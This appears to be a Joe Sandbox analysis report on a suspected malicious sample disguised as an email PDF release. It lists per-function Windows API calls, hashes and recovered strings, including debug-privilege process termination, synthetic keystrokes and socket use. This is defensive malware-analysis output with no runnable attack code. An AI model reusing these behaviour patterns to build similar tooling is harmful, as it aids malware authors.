                                                                                                          • Opcode ID: b73569640ed33fa6d9f43ab0adfc513dc024400cad3d2d9c9c74e7c561758287
                                                                                                          • Instruction ID: d59d86a85c3daf9712b9959ebb0ec57a19a678ec25fe0905a07884f08aec7174
                                                                                                          • Opcode Fuzzy Hash: b73569640ed33fa6d9f43ab0adfc513dc024400cad3d2d9c9c74e7c561758287
                                                                                                          • Instruction Fuzzy Hash: 13E1C171604300DFCB14EF24C885F6ABBE1AF85350F14856DF9999B2A2CB78EC45CB52
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B3697,?), ref: 007B468B
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B3697,?), ref: 007B46A4
                                                                                                            • Part of subcall function 007B4A31: GetFileAttributesW.KERNEL32(?,007B370B), ref: 007B4A32
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 007B4D40
                                                                                                          • _wcscmp.LIBCMT ref: 007B4D5A
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 007B4D75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 793581249-0
                                                                                                          • Opcode ID: 23a276bc2a1e6e937f31a8eadb6ae6df39f89bf0be19c7223790f79c4de05be2
                                                                                                          • Instruction ID: 2f3b446be813357e4a6f055d4d906320f9cd15d71918bd96b3da2ab4d971ff19
                                                                                                          • Opcode Fuzzy Hash: 23a276bc2a1e6e937f31a8eadb6ae6df39f89bf0be19c7223790f79c4de05be2
                                                                                                          • Instruction Fuzzy Hash: D25177B2108385DBC724DB60D895ADFB3ECAF84351F00492EF689D3152EF78A588C756
                                                                                                          APIs
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007D86FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 634782764-0
                                                                                                          • Opcode ID: 20338c79bf46d311fdbd3d76963fb3f3deec65e69fb533b0c6230f5754831090
                                                                                                          • Instruction ID: 60e1dc41fcac95f9549743ecc5472c5379315dd2952bd767c24cc991c4e85b49
                                                                                                          • Opcode Fuzzy Hash: 20338c79bf46d311fdbd3d76963fb3f3deec65e69fb533b0c6230f5754831090
                                                                                                          • Instruction Fuzzy Hash: 4D518030610244FEDBA09B68CC89FA97B75BB05720F604157F911E63A1CB79E980DB52
                                                                                                          APIs
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078C2F7
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078C319
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078C331
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078C34F
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078C370
                                                                                                          • DestroyIcon.USER32(00000000), ref: 0078C37F
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078C39C
                                                                                                          • DestroyIcon.USER32(?), ref: 0078C3AB
                                                                                                            • Part of subcall function 007DA4AF: DeleteObject.GDI32(00000000), ref: 007DA4E8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819616528-0
                                                                                                          • Opcode ID: 06edfa4877cd2246663cb0812302f1db3ae51b935f5f69796f8718103e314405
                                                                                                          • Instruction ID: c334d5c3de1058400765a8e7c8f7ceabe46e5a9cbade84e3a2bd174bba4c4650
                                                                                                          • Opcode Fuzzy Hash: 06edfa4877cd2246663cb0812302f1db3ae51b935f5f69796f8718103e314405
                                                                                                          • Instruction Fuzzy Hash: 51516970A40205EFDB20EF64CC45BAA3BB5FB49311F108529F902976A1D7B8ED96DB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 007AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA84C
                                                                                                            • Part of subcall function 007AA82C: GetCurrentThreadId.KERNEL32 ref: 007AA853
                                                                                                            • Part of subcall function 007AA82C: AttachThreadInput.USER32(00000000,?,007A9683,?,00000001), ref: 007AA85A
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A968E
                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A96AB
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007A96AE
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A96B7
                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A96D5
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A96D8
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A96E1
                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A96F8
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A96FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2014098862-0
                                                                                                          • Opcode ID: d68c30593294ed8a8ac84ad6d975d9eefd0714951f36ff22f09e3bbbd26975a7
                                                                                                          • Instruction ID: f2d8793ee85d4a8e8fa86527534936da4557efc668e3a49ad42f6e8c4273c386
                                                                                                          • Opcode Fuzzy Hash: d68c30593294ed8a8ac84ad6d975d9eefd0714951f36ff22f09e3bbbd26975a7
                                                                                                          • Instruction Fuzzy Hash: 0611E1B1910218FEF6106F60DC89F6A3B2DEB4D750F104426F345AB0A0CAFB5C10DAA8
                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007A853C,00000B00,?,?), ref: 007A892A
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,007A853C,00000B00,?,?), ref: 007A8931
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007A853C,00000B00,?,?), ref: 007A8946
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,007A853C,00000B00,?,?), ref: 007A894E
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,007A853C,00000B00,?,?), ref: 007A8951
                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007A853C,00000B00,?,?), ref: 007A8961
                                                                                                          • GetCurrentProcess.KERNEL32(007A853C,00000000,?,007A853C,00000B00,?,?), ref: 007A8969
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,007A853C,00000B00,?,?), ref: 007A896C
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,007A8992,00000000,00000000,00000000), ref: 007A8986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: f5dc7b9eb525559268fa51461bc29918b036be52716d82aacb7fff4990ee1c10
                                                                                                          • Instruction ID: 96b43d41b6b7a66f2357d7cdfd344437e0e695db0ee80fa96f7fa6217d6bbbf8
                                                                                                          • Opcode Fuzzy Hash: f5dc7b9eb525559268fa51461bc29918b036be52716d82aacb7fff4990ee1c10
                                                                                                          • Instruction Fuzzy Hash: 6201BBB5241308FFE710ABA5DC4DF6B3BACEB89711F408421FA05DB1A1CA75AC00CB25
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 0-572801152
                                                                                                          • Opcode ID: 119794b651674c3f539add1324a4c7a39c86cd3ea2b37ff697e808135e554e19
                                                                                                          • Instruction ID: b01fdd0843e60cf36fa254a780a13394958d5910ec69608bb851353313bc53b5
                                                                                                          • Opcode Fuzzy Hash: 119794b651674c3f539add1324a4c7a39c86cd3ea2b37ff697e808135e554e19
                                                                                                          • Instruction Fuzzy Hash: B2C19371A00219ABDF50CF68D888FAEB7F5FF58314F15846DEA05A7281E7749D41CBA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?,?,007A7455), ref: 007A7127
                                                                                                            • Part of subcall function 007A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7142
                                                                                                            • Part of subcall function 007A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7150
                                                                                                            • Part of subcall function 007A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?), ref: 007A7160
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007C9806
                                                                                                          • _memset.LIBCMT ref: 007C9813
                                                                                                          • _memset.LIBCMT ref: 007C9956
                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007C9982
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 007C998D
                                                                                                          Strings
                                                                                                          • NULL Pointer assignment, xrefs: 007C99DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                          • String ID: NULL Pointer assignment
                                                                                                          • API String ID: 1300414916-2785691316
                                                                                                          • Opcode ID: adb557043e2c89fe82fce00945b277d278b3b6f9dbaca9fbb315aed81e995c35
                                                                                                          • Instruction ID: d893294444cf98b5b639e62d5d62856a9210d630010db16c49b9bab9486d70cb
                                                                                                          • Instruction Fuzzy Hash: 49914A71D00218EBDB10DFA5DC48EDEBBB9EF48310F20815AF519A7291DB75AA44CFA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                          • _memset.LIBCMT ref: 007B2B87
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B2BB6
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B2C69
                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007B2C97
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                          • String ID: 0$8Z$8Z
                                                                                                          • API String ID: 4152858687-1504830169
                                                                                                          • Opcode ID: ce73ce74d4fce5f02cae695ed811426db57139718e82f8c657b56928f8a1eb22
                                                                                                          • Instruction ID: 12a5e67b3d7a84d959100ed7f3d8c0575eea8e42fa4f07e560c38bd3bcf46b1e
                                                                                                          • Instruction Fuzzy Hash: BA51D37160A3009AD7249F24D845BEF7BE8EF89350F044A2DF895D31A2DB78CD4687A2
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D6E24
                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D6E38
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D6E52
                                                                                                          • _wcscat.LIBCMT ref: 007D6EAD
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D6EC4
                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D6EF2
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                          • String ID: SysListView32
                                                                                                          • API String ID: 307300125-78025650
                                                                                                          • Opcode ID: 09d2413cf272ec3488873cc270f3f4e37cf2e7008c2e135028ff2d1487111f0d
                                                                                                          • Instruction ID: 8bb3e6b50166ac08cd6162ce54cb3827ae52500766b95eb9db2018f3ef6949c3
                                                                                                          • Instruction Fuzzy Hash: 9741A071A00348EFEF219F64CC89BEA77B9EF08350F10442AF595E7292D6799D848B60
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3C7A
                                                                                                            • Part of subcall function 007B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 007B3C88
                                                                                                            • Part of subcall function 007B3C55: CloseHandle.KERNEL32(00000000), ref: 007B3D52
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CE9A4
                                                                                                          • GetLastError.KERNEL32 ref: 007CE9B7
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CE9E6
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007CEA63
                                                                                                          • GetLastError.KERNEL32(00000000), ref: 007CEA6E
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007CEAA3
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                          • String ID: SeDebugPrivilege
                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                          • Opcode ID: c25a9bc02de67f2ad40ed7bb29f462bde60f99d19a7e2a99a795ba723698825e
                                                                                                          • Instruction ID: 5d4aab92e17e1a04db5537e8e7cffa70a0361561390b62c836aac74ca912c1ea
                                                                                                          • Instruction Fuzzy Hash: E8418C71600201DFDB14EF24CC99F6EB7A5AF81314F18845DFA469B2D2CBB9A908CF95
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 007B3033
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2457776203-404129466
                                                                                                          • Opcode ID: 817ccff5f7b1554625c947b7405539d19d8d804e2378af03ad1c953e80897d0c
                                                                                                          • Instruction ID: 6a9f2745ca0a9eb1567988d7bab3f578990ccd98a8213f2ade4e86d1ca62f66b
                                                                                                          • Instruction Fuzzy Hash: B5112B3134C346FEEB14AB54DC86EEB779CDF19360B10402AF914A62C2DBBC6F8155A4
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007B4312
                                                                                                          • LoadStringW.USER32(00000000), ref: 007B4319
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B432F
                                                                                                          • LoadStringW.USER32(00000000), ref: 007B4336
                                                                                                          • _wprintf.LIBCMT ref: 007B435C
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B437A
                                                                                                          Strings
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 007B4357
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                          • API String ID: 3648134473-3128320259
                                                                                                          • Opcode ID: 97f0892134ff938597f00ce6be63ce1526a97dea42eb9b0f4ee63db8b5e3e700
                                                                                                          • Instruction ID: b362c97f36d189b1be5f41e48639cf87e025a79be486458db5799528915eb0b4
                                                                                                          • Instruction Fuzzy Hash: DC014FF2901208BFE75197A4DD89EE6777CEB08301F0085A2F74AE2051EA799E854B74
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 007DD47C
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 007DD49C
                                                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007DD6D7
                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007DD6F5
                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007DD716
                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 007DD735
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007DD75A
                                                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 007DD77D
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1211466189-0
                                                                                                          • Opcode ID: a98166fb7e923271caa9a7b143a314b9bfae7f59924583a8a750ff0e118841b1
                                                                                                          • Instruction ID: 301b0817f3e5711c1eeb92faf5d7ce069f2e1c580e1ce10410aa10897915e93b
                                                                                                          • Instruction Fuzzy Hash: CCB18971600225EBDF24CF68C9857A97BB1FF08711F08C0AAED499B295D778AD50CBA0
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000), ref: 00752ACF
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00752B17
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000), ref: 0078C21A
                                                                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C1C7,00000004,00000000,00000000,00000000), ref: 0078C286
                                                                                                          Similarity
                                                                                                          • API ID: ShowWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1268545403-0
                                                                                                          • Opcode ID: ac2e2bc3bae665e6e506103defd53602d868fa475c13ad424906e59310dfeca1
                                                                                                          • Instruction ID: 2c8e61d320a0ded6cf51f46ab3c2ed81692c875bfa978b1a7c71db0c26ef419e
                                                                                                          • Opcode Fuzzy Hash: ac2e2bc3bae665e6e506103defd53602d868fa475c13ad424906e59310dfeca1
                                                                                                          • Instruction Fuzzy Hash: 8141DE31604680EAD7369B288C8CBEB7B95BB47311F54C41DED4786562C6BD984FD720
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 007B70DD
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007B7114
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 007B7130
                                                                                                          • _memmove.LIBCMT ref: 007B717E
                                                                                                          • _memmove.LIBCMT ref: 007B719B
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 007B71AA
                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007B71BF
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B71DE
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 256516436-0
                                                                                                          • Opcode ID: f672c31e4f69ba7849d74945c051ac966153d73e6433dafc024ebadcd8b5a80c
                                                                                                          • Instruction ID: 4cfbac2200c34bd5371541dd0c1c23c80a71a2666799a2d1951945fceae4bbc2
                                                                                                          • Opcode Fuzzy Hash: f672c31e4f69ba7849d74945c051ac966153d73e6433dafc024ebadcd8b5a80c
                                                                                                          • Instruction Fuzzy Hash: 01315271900209EBCF10EFA4DC89AAE7778FF85710F1481A5F9049B256D7789E10CBA4
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007D61EB
                                                                                                          • GetDC.USER32(00000000), ref: 007D61F3
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D61FE
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 007D620A
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007D6246
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D6257
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 007D6291
                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D62B1
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3864802216-0
                                                                                                          • Opcode ID: 094565adda403da859073252ecb42b16d222aa304ec6c8d51613a4ca3c263119
                                                                                                          • Instruction ID: 3706e5aff204bb78864eaca1bd986fc4e22c9bd7bf0c7033fc6b8d262b1b9a90
                                                                                                          • Opcode Fuzzy Hash: 094565adda403da859073252ecb42b16d222aa304ec6c8d51613a4ca3c263119
                                                                                                          • Instruction Fuzzy Hash: F8314B72201214BFEB118F54CC8AFEA3BB9EF49765F048066FE099A291D6799841CB64
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2931989736-0
                                                                                                          • Opcode ID: 6405796b30eeff1422f7b751e33e3bd21dee1d8af346262282953cc0dab330c3
                                                                                                          • Instruction ID: 06dcdcfacb8b2c1226dca492ad44f9425b21f49161ab262822a6ae850c12807c
                                                                                                          • Opcode Fuzzy Hash: 6405796b30eeff1422f7b751e33e3bd21dee1d8af346262282953cc0dab330c3
                                                                                                          • Instruction Fuzzy Hash: 0121F9F1702245BBE70466269D42FFB735DAE96398F448120FD0896683FB1CDE11C2B1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                          • _wcstok.LIBCMT ref: 007BEC94
                                                                                                          • _wcscpy.LIBCMT ref: 007BED23
                                                                                                          • _memset.LIBCMT ref: 007BED56
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                          • String ID: X
                                                                                                          • API String ID: 774024439-3081909835
                                                                                                          • Opcode ID: 476108360bef0577f670d44f15b9da2b22eef6149d92dd620d0eb81b2b47a910
                                                                                                          • Instruction ID: a45d84a60a4245fd76d8469e62bebc821d4cdc951b73c1e556064d9557a6abc6
                                                                                                          • Opcode Fuzzy Hash: 476108360bef0577f670d44f15b9da2b22eef6149d92dd620d0eb81b2b47a910
                                                                                                          • Instruction Fuzzy Hash: C9C17D70508700DFD754EF24C849AEAB7E4AF85310F04492DF999973A2DB78EC49CB92
                                                                                                          APIs
                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007C6C00
                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007C6C21
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C6C34
                                                                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 007C6CEA
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 007C6CA7
                                                                                                            • Part of subcall function 007AA7E9: _strlen.LIBCMT ref: 007AA7F3
                                                                                                            • Part of subcall function 007AA7E9: _memmove.LIBCMT ref: 007AA815
                                                                                                          • _strlen.LIBCMT ref: 007C6D44
                                                                                                          • _memmove.LIBCMT ref: 007C6DAD
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 3619996494-0
